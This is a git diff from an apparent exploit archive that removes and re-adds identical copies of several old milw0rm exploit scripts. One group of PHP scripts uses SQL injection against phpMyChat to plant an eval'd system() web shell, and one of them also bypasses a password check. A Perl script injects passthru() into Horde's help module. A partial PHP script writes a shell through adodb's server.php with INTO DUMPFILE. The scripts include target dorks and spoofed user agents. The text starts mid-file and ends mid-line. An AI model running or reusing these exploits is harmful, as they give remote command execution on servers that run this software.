proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} -function make_seed() -{ - list($usec, $sec) = explode(' ', microtime()); - return (float) $sec + ((float) $usec * 100000); -} - - -$host=$argv[1]; -$path=$argv[2]; -$action=$argv[3]; -$cmd="";$port=80;$proxy=""; - -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - - -#step 1 -> SQL Injection, works regardsless of any magic_quotes_gpc seetings, it is an INSERT INTO query -#let's store a shell in c_messages table -$L="L=english"; -$U=""; - -$T ="0,"; //type -$T.="CHAR(68,101,102,97,117,108,116),"; //room (Default) -$T.="CHAR(83,89,83,32,101,110,116,101,114),"; //username (SYS enter) -$T.="0,";//latin1 -$T.="9999999999,";//m_time -$T.="1,";//address - -//message (our encoded shell -> system($_GET[cmd]);die ) ,if system() is disabled, reencode a new one with passthru() or exec() -//u can use an unlimited number of chars for this -$T.="CHAR(115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,59,100,105,101))/*"; - -$T="T=".urlencode($T); - -for ($i=0; $i<=1; $i++) //redo -{ -srand(make_seed()); -$anumber = rand(1,99999); -$R="R=Default".$anumber; //random, it must be different from the previous one -$packet ="GET ".$p."chat/messagesL.php3?$L&$U&$T&$R 
HTTP/1.0\r\n"; -$packet.="X-Forwarded-For: suntzuuuuuuu\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -//debug -//echo quick_dump($packet); -sendpacketii($packet); -} -sleep(2); -#step 2 -> shell is passed to an eval(), so we launch commands -$packet ="GET ".$p."chat/messagesL.php3?L=english&R=Default&N=9999&T=0&U=SYS%20enter&cmd=".$cmd." HTTP/1.0\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -//debug -//echo quick_dump($packet); -sendpacketii($packet); -echo $html; -?> - -# milw0rm.com [2006-04-05] +#!/usr/bin/php -q -d short_open_tag=on +query("INSERT INTO ".C_MSG_TBL." VALUES ($T, '$R', 'SYS exit', '', ".time().", '', 'sprintf(L_EXIT_ROM, \"".special_char($U,$Latin1,1)."\")')"); +# $kicked = 3; +# } +# ... +# +# have a look to "T" argument, it is not sanitized before to be used in our +# INSERT query, so we can inject all the values we want and store them +# in the c_messages table. Also it is not delimited by quotes & we do not need +# quotes to extend the query, so this works regardless of magic_quotes_gpc settings +# +# sprintf() should be passed to an eval() near line 197: +# +# ... +# // "System" messages +# else +# { +# if ($Dest == " *") +# { +# $Message = "[".L_ANNOUNCE."] ".$Message; +# } +# else +# { +# if ($Dest != "") $NewMsg .= ">[".htmlspecialchars(stripslashes($Dest))."] "; +# $Message = str_replace("$","\\$",$Message); // avoid '$' chars in nick to be parsed bellow +# eval("\$Message = $Message;"); +# }; +# $NewMsg .= "".$Message."

    "; +# }; +# ... +# +# but what happen if we inject a system() call instead and if we simulate +# to be the SYS user? :) +# +# this is 0day, enjoy it + +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} +function make_seed() +{ + list($usec, $sec) = explode(' ', microtime()); + return (float) $sec + ((float) $usec * 100000); +} + + +$host=$argv[1]; +$path=$argv[2]; +$action=$argv[3]; +$cmd="";$port=80;$proxy=""; + +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); + +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + + +#step 1 -> SQL Injection, works regardsless of any magic_quotes_gpc seetings, it is an INSERT INTO query +#let's store a shell in c_messages table +$L="L=english"; +$U=""; + +$T ="0,"; //type +$T.="CHAR(68,101,102,97,117,108,116),"; //room (Default) +$T.="CHAR(83,89,83,32,101,110,116,101,114),"; //username (SYS enter) +$T.="0,";//latin1 +$T.="9999999999,";//m_time +$T.="1,";//address + +//message (our encoded shell -> system($_GET[cmd]);die ) ,if system() is disabled, reencode a new one with passthru() or exec() +//u can use an unlimited number of chars for this +$T.="CHAR(115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,59,100,105,101))/*"; + +$T="T=".urlencode($T); + +for ($i=0; $i<=1; $i++) //redo +{ +srand(make_seed()); +$anumber = rand(1,99999); +$R="R=Default".$anumber; //random, it must be different from the previous one +$packet ="GET ".$p."chat/messagesL.php3?$L&$U&$T&$R 
HTTP/1.0\r\n";
+$packet.="X-Forwarded-For: suntzuuuuuuu\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+//debug
+//echo quick_dump($packet);
+sendpacketii($packet);
+}
+sleep(2);
+#step 2 -> shell is passed to an eval(), so we launch commands
+$packet ="GET ".$p."chat/messagesL.php3?L=english&R=Default&N=9999&T=0&U=SYS%20enter&cmd=".$cmd." HTTP/1.0\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+//debug
+//echo quick_dump($packet);
+sendpacketii($packet);
+echo $html;
+?>
+
+# milw0rm.com [2006-04-05]
diff --git a/platforms/php/webapps/1647.php b/platforms/php/webapps/1647.php
index 7f7738868..c8b2ed687 100755
--- a/platforms/php/webapps/1647.php
+++ b/platforms/php/webapps/1647.php
@@ -1,207 +1,207 @@ -#!/usr/bin/php -q -d short_open_tag=on - works with magic_quotes_gpc=Off\r\n\r\n"; -echo "dork: intext:\"2000-2001 The phpHeaven Team\" -sourceforge\r\n\r\n"; - -if ($argc<4) { -echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to PHPMyChat\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /phpmychat/ cat ./config/config.lib.php\r\n"; -echo "php ".$argv[0]." localhost /phpmychat/ ls -la -p81\r\n"; -echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; -die; -} - -# explaination: -# -# only modified this one: -# -# http://retrogod.altervista.org/phpmychat_0145_xpl.html -# -# actually I tested this package: -# -# http://prdownloads.sourceforge.net/phpmychat/phpMyChat-0.15.0-dev20050206.tgz?download -# -# code is no properly patched 'cause, if magic_quotes_gpc = Off, you can inject -# an "always true" statement in PWD_Hash argument - -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = 
preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} -function make_seed() -{ - list($usec, $sec) = explode(' ', microtime()); - return (float) $sec + ((float) $usec * 100000); -} - - -$host=$argv[1]; -$path=$argv[2]; -$action=$argv[3]; -$cmd="";$port=80;$proxy=""; - -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -#step 1 -> Register, we need an online user -srand(make_seed()); -$anumber = rand(1,99999); -$data="FORM_SEND=1"; -$data.="&L=italian"; -$data.="&U=suntzu".$anumber; -$data.="&pmc_password=suntzoi".$anumber; -$data.="&FIRSTNAME=suntzu"; -$data.="&LASTNAME=suntzoi"; -$data.="&GENDER=1"; -$data.="&COUNTRY="; -$data.="&WEBSITE="; -$data.="&EMAIL=suntzu@suntzuuu.com"; -$data.="&SHOWEMAIL=0"; -$data.="&submit_type=Registrati"; -$packet ="POST ".$p."chat/register.php HTTP/1.0\r\n"; -$packet.="X-Forwarded-For: 127.0.0.1\r\n"; //spoof , a nice ip value for c_regusers table -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n"; -$packet.="Cookie: CookieLang=italian;\r\n\r\n"; -$packet.=$data; -#debug -#echo quick_dump($packet); -sendpacketii($packet); - -#step 2 -> Login -$packet ="GET ".$p."chat/loader.php?From=..%2FphpMyChat.php3&L=italian&Ver=H"; -$packet.="&U=suntzu".$anumber."&R=Default&T=1&D=10&N=20&ST=1&NT=1&PWD_Hash=".md5("suntzoi".$anumber)."&First=1 HTTP/1.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n"; -$packet.="Cookie: CookieLang=italian; CookieUsername=suntzu".$anumber."; CookieRoom=Default; CookieRoomType=1\r\n\r\n"; -#debug -#echo quick_dump($packet); -sendpacketii($packet); - -#step 3 -> SQL Injection, let's store a shell in c_messages table -$L="L=english"; -$U="U=SYS%20enter"; -$T ="0,"; //type -$T.="CHAR(68,101,102,97,117,108,116),"; //room (Default) -$T.="CHAR(83,89,83,32,101,110,116,101,114),"; //username (SYS enter) -$T.="0,";//latin1 -$T.="9999999999,";//m_time -$T.="1,";//address -//message (our encoded shell -> system($_GET[cmd]);die ) ,if system() is disabled, reencode a new one with passthru() or exec() -//u can use an unlimited number of chars for this 
-$T.="CHAR(115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,59,100,105,101))/*"; -$T="T=".urlencode($T); - -$PWD="'or'a'='a' UNION SELECT c_users.room, c_users.status, c_users.ip FROM c_users, c_reg_users WHERE 'a'='a' LIMIT 1/*"; -$PWD=urlencode($PWD); - -for ($i=0; $i<=1; $i++) //redo -{ -srand(make_seed()); -$anumber = rand(1,99999); -$R="R=Default".$anumber; //random, it must be different from the previous one -$packet ="GET ".$p."chat/messagesL.php?$L&$U&$T&$R&PWD_Hash=$PWD HTTP/1.0\r\n"; -$packet.="X-Forwarded-For: suntzuuuuuuu\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -#debug -#echo quick_dump($packet); -sendpacketii($packet); -} -sleep(1); -#step 4 -> shell is passed to an eval(), so we launch commands -$packet ="GET ".$p."chat/messagesL.php?L=english&R=Default&N=9999&T=0&U=SYS%20enter&cmd=".$cmd."&PWD_Hash=$PWD HTTP/1.0\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -#debug -#echo quick_dump($packet); -sendpacketii($packet); -echo $html; -?> - -# milw0rm.com [2006-04-06] +#!/usr/bin/php -q -d short_open_tag=on + works with magic_quotes_gpc=Off\r\n\r\n"; +echo "dork: intext:\"2000-2001 The phpHeaven Team\" -sourceforge\r\n\r\n"; + +if ($argc<4) { +echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to PHPMyChat\r\n"; +echo "cmd: a shell command\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /phpmychat/ cat ./config/config.lib.php\r\n"; +echo "php ".$argv[0]." localhost /phpmychat/ ls -la -p81\r\n"; +echo "php ".$argv[0]." 
localhost / ls -la -P1.1.1.1:80\r\n"; +die; +} + +# explaination: +# +# only modified this one: +# +# http://retrogod.altervista.org/phpmychat_0145_xpl.html +# +# actually I tested this package: +# +# http://prdownloads.sourceforge.net/phpmychat/phpMyChat-0.15.0-dev20050206.tgz?download +# +# code is no properly patched 'cause, if magic_quotes_gpc = Off, you can inject +# an "always true" statement in PWD_Hash argument + +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} +function make_seed() +{ + list($usec, $sec) = explode(' ', microtime()); + return (float) $sec + ((float) $usec * 100000); +} + + +$host=$argv[1]; +$path=$argv[2]; +$action=$argv[3]; +$cmd="";$port=80;$proxy=""; + +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); + +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +#step 1 -> Register, we need an online user +srand(make_seed()); +$anumber = rand(1,99999); +$data="FORM_SEND=1"; +$data.="&L=italian"; +$data.="&U=suntzu".$anumber; +$data.="&pmc_password=suntzoi".$anumber; +$data.="&FIRSTNAME=suntzu"; +$data.="&LASTNAME=suntzoi"; +$data.="&GENDER=1"; +$data.="&COUNTRY="; +$data.="&WEBSITE="; +$data.="&EMAIL=suntzu@suntzuuu.com"; +$data.="&SHOWEMAIL=0"; +$data.="&submit_type=Registrati"; +$packet ="POST ".$p."chat/register.php HTTP/1.0\r\n"; +$packet.="X-Forwarded-For: 127.0.0.1\r\n"; //spoof , a nice ip value for c_regusers table +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n"; +$packet.="Cookie: CookieLang=italian;\r\n\r\n"; +$packet.=$data; +#debug +#echo quick_dump($packet); +sendpacketii($packet); + +#step 2 -> Login +$packet 
="GET ".$p."chat/loader.php?From=..%2FphpMyChat.php3&L=italian&Ver=H"; +$packet.="&U=suntzu".$anumber."&R=Default&T=1&D=10&N=20&ST=1&NT=1&PWD_Hash=".md5("suntzoi".$anumber)."&First=1 HTTP/1.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n"; +$packet.="Cookie: CookieLang=italian; CookieUsername=suntzu".$anumber."; CookieRoom=Default; CookieRoomType=1\r\n\r\n"; +#debug +#echo quick_dump($packet); +sendpacketii($packet); + +#step 3 -> SQL Injection, let's store a shell in c_messages table +$L="L=english"; +$U="U=SYS%20enter"; +$T ="0,"; //type +$T.="CHAR(68,101,102,97,117,108,116),"; //room (Default) +$T.="CHAR(83,89,83,32,101,110,116,101,114),"; //username (SYS enter) +$T.="0,";//latin1 +$T.="9999999999,";//m_time +$T.="1,";//address +//message (our encoded shell -> system($_GET[cmd]);die ) ,if system() is disabled, reencode a new one with passthru() or exec() +//u can use an unlimited number of chars for this +$T.="CHAR(115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,59,100,105,101))/*"; +$T="T=".urlencode($T); + +$PWD="'or'a'='a' UNION SELECT c_users.room, c_users.status, c_users.ip FROM c_users, c_reg_users WHERE 'a'='a' LIMIT 1/*"; +$PWD=urlencode($PWD); + +for ($i=0; $i<=1; $i++) //redo +{ +srand(make_seed()); +$anumber = rand(1,99999); +$R="R=Default".$anumber; //random, it must be different from the previous one +$packet ="GET ".$p."chat/messagesL.php?$L&$U&$T&$R&PWD_Hash=$PWD HTTP/1.0\r\n"; +$packet.="X-Forwarded-For: suntzuuuuuuu\r\n"; +$packet.="User-Agent: Googlebot/2.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +#debug +#echo quick_dump($packet); +sendpacketii($packet); +} +sleep(1); +#step 4 -> shell is passed to an eval(), so we launch commands +$packet ="GET ".$p."chat/messagesL.php?L=english&R=Default&N=9999&T=0&U=SYS%20enter&cmd=".$cmd."&PWD_Hash=$PWD HTTP/1.0\r\n"; +$packet.="User-Agent: Googlebot/2.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: 
Close\r\n\r\n";
+#debug
+//echo quick_dump($packet);
+sendpacketii($packet);
+echo $html;
+?>
+
+# milw0rm.com [2006-04-06]
diff --git a/platforms/php/webapps/1650.pl b/platforms/php/webapps/1650.pl
index 1462cb094..ee7b1845a 100755
--- a/platforms/php/webapps/1650.pl
+++ b/platforms/php/webapps/1650.pl
@@ -1,130 +1,130 @@ -#!/usr/bin/perl -# Wed Apr 5 21:51:12 CEST 2006 jolascoaga@514.es -# -# Horde help module remote execution -# -# telnet 310.27.901.33.1109 1689 # thanks horatio for the address -# USER paranoia -# PASS total -# SYST -# REST 100 -# REST 0 -# PWD -# TYPE A -# PASV -# LIST -# CWD 0days -# GET horddy.pl -# -# w0w this damn 0day ftp is so sexy! -# -# GO GO GO !! GO GO GO !! Team fall back! -# -# Example: ./horddy.pl --host=http://www.server.com/horde -# -# Now for your X-box ! -# -# Greets: -# - all 514 crew -# - mallorca ppl r0xing. -# -# THIS IS PENE! TIMMY!!! LIVIN' A LIE! -# - - -use strict; -use LWP::UserAgent; -use LWP::Simple; -use HTTP::Request; -use HTTP::Response; -use Getopt::Long; - -$| = 1; # mess with the best? don't mess with my buffer - -my ($proxy,$proxy_user,$proxy_pass); -my ($host,$debug,$dir, $command); -my $use_ssl = 0; - -my $options = GetOptions ( - 'host=s' => \$host, - 'dir=s' => \$dir, - 'proxy=s' => \$proxy, - 'proxy_user=s' => \$proxy_user, - 'proxy_pass=s' => \$proxy_pass, - 'debug' => \$debug); - -&help unless ($host); # please don't try this at home. 
- -$dir = "/horde/" unless($dir); -print "$host - $dir\n"; - -while () { -print "horddy> "; # lost connection -while() { -$command=$_; -chomp($command); -last; -} -&send($command); -} - -sub buildcmd {# this is a useful comment -my ($cmd) = @_; -# wonderful hacking -$cmd =~ s/ /\%20/gi; -$cmd =~ s/\//\"\.chr\(47\)\.\"/gi; - -return $cmd; -} - -sub send { - my ($tmp) = @_; - my $ok=0; - my $cmd = buildcmd ($tmp); # this is really magic ^^ - my $socket; - LWP::Debug::level('+') if $debug; # but remember this is crap :D - - my $ua = new LWP::UserAgent(); - $ua->agent("Nozilla/P.N (Just for IDS woring)"); # this is not me :/ - - my $string = "/$dir/services/help/?show=about&module=;\".passthru(\"$cmd\");'."; - - if ($host !~ /^http/) { -$host = sprintf ("http://%s", $host); # CRAP CRAP CRAP - } - - my $req = HTTP::Request->new (GET => $host.$string); - $ua->proxy(['http'] => $proxy) if $proxy; - $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; - - print $req->as_string() if $debug; - - my $res = $ua->request($req); - my $html = $res->content(); - - foreach (split(/\n/,$html)) { -if ((/

    /)) { # brum brum conditionals desmitified -last; -} -print "$_\n" if $ok eq "1"; # i don't think this is usefull -if (/ \$host, + 'dir=s' => \$dir, + 'proxy=s' => \$proxy, + 'proxy_user=s' => \$proxy_user, + 'proxy_pass=s' => \$proxy_pass, + 'debug' => \$debug); + +&help unless ($host); # please don't try this at home. + +$dir = "/horde/" unless($dir); +print "$host - $dir\n"; + +while () { +print "horddy> "; # lost connection +while() { +$command=$_; +chomp($command); +last; +} +&send($command); +} + +sub buildcmd {# this is a useful comment +my ($cmd) = @_; +# wonderful hacking +$cmd =~ s/ /\%20/gi; +$cmd =~ s/\//\"\.chr\(47\)\.\"/gi; + +return $cmd; +} + +sub send { + my ($tmp) = @_; + my $ok=0; + my $cmd = buildcmd ($tmp); # this is really magic ^^ + my $socket; + LWP::Debug::level('+') if $debug; # but remember this is crap :D + + my $ua = new LWP::UserAgent(); + $ua->agent("Nozilla/P.N (Just for IDS woring)"); # this is not me :/ + + my $string = "/$dir/services/help/?show=about&module=;\".passthru(\"$cmd\");'."; + + if ($host !~ /^http/) { +$host = sprintf ("http://%s", $host); # CRAP CRAP CRAP + } + + my $req = HTTP::Request->new (GET => $host.$string); + $ua->proxy(['http'] => $proxy) if $proxy; + $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; + + print $req->as_string() if $debug; + + my $res = $ua->request($req); + my $html = $res->content(); + + foreach (split(/\n/,$html)) { +if ((/

    /)) { # brum brum conditionals desmitified +last; +} +print "$_\n" if $ok eq "1"; # i don't think this is usefull +if (/ 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$action=$argv[3]; -$cmd="";$port=80;$proxy=""; - -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -#step 1->read DOCUMENT ROOT from phpinfo -$packet ="GET ".$p."include/adodb/tests/tmssql.php?do=phpinfo HTTP/1.0\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -$temp=explode("DOCUMENT_ROOT ",$html); -$temp2=explode(" ",$temp[1]); -$fullpath=$temp2[0]; -$fullpath=trim($fullpath); -echo "DOCUMENT ROOT ->".$fullpath."\r\n\r\n"; -$fullpath=str_replace("\\","\\\\\\\\",$fullpath); // win boxes -if ($fullpath=="") -{ -echo $html; -die("\r\n\r\nCannot read phpinfo ...\r\n"); -} - -#step 2->execute a query (you can regardless of magic_quotes_gpc) -$SQL ="SELECT '',0,0,0,0,0 "; -$SQL.="INTO DUMPFILE '".$fullpath."/suntzu.php' FROM poc.poc_user_account LIMIT 1"; -$SQL=urlencode($SQL); -$packet ="GET ".$p."include/adodb/server.php?sql=$SQL HTTP/1.0\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -if (strstr($html,"Access denied") || !strstr($html,"200 OK") || strstr($html,"Can't connect")) -{ -echo $html; -die("\r\n\r\nExploit failed...\r\n"); -} -sleep(1); -#step 3->launch commands -$packet ="GET /suntzu.php?cmd=".$cmd." 
